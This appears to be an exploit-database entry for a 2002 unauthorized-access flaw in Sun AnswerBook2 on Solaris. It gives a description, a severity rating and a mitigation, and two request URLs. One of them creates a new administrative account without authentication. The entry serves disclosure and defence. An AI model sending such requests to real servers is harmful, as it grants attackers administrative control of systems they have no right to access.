header-logo
Suggest Exploit
vendor:
AnswerBook2
by:
SecurityFocus
7.5
CVSS
HIGH
Unauthorized Access
287
CWE
Product Name: AnswerBook2
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: a:sun:answerbook2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Solaris
2002

Sun Microsystems AnswerBook2 Unauthorized Access Vulnerability

Sun Microsystems AnswerBook2 allows users to view Sun documentation through a web browser, and is available for Solaris. AnswerBook2 includes an administrative web interface. Reportedly, it is possible to access these scripts without authorization, and add a new administrative user of the AnswerBook2 system.

Mitigation:

Restrict access to the administrative web interface of AnswerBook2.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/5383/info

Sun Microsystems AnswerBook2 allows users to view Sun documentation through a web browser, and is available for Solaris.

AnswerBook2 includes an administrative web interface. Reportedly, it is possible to access these scripts without authorization, and add a new administrative user of the AnswerBook2 system. 

http://localhost:8888/ab2/@AdminViewError

http://localhost:8888/ab2/@AdminAddadmin?uid=foo&password=bar&re_password=bar

Navigation

Suggest Exploit

Services By CQR